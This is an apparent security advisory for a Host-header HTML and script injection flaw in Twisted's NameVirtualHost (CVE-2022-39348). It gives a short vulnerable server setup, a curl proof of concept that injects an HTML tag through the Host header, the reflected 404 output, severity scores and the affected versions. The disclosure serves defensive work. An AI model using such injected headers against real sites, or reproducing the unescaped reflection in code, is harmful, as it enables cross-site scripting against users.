When the host header does not match a configured host, twisted.web.vhost.NameVirtualHost will return a NoResource resource which renders the Host header unescaped into the 404 response allowing HTML and script injection.
Example configuration:
from twisted.web.server import Site
from twisted.web.vhost import NameVirtualHost
from twisted.internet import reactor
resource = NameVirtualHost()
site = Site(resource)
reactor.listenTCP(8080, site)
reactor.run()
Output:
❯ curl -H"Host:<h1>HELLO THERE</h1>" http://localhost:8080/
<html>
<head><title>404 - No Such Resource</title></head>
<body>
<h1>No Such Resource</h1>
<p>host b'<h1>hello there</h1>' not in vhost map</p>
</body>
</html>
This vulnerability was introduced in f49041bb67792506d85aeda9cf6157e92f8048f4 and first appeared in the 0.9.4 release.
| Score | Percentile |
|---|---|
| 1.14% | 78.36% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 5.4 | 3.1 | — |
|
| 5.1 | 4.0 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-vg46-2rrj-3647 ↗ |
| CVE | CVE-2022-39348 ↗ |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| pip | twisted | >= 0.9.4, < 22.10.0rc1 | 22.10.0rc1 | — |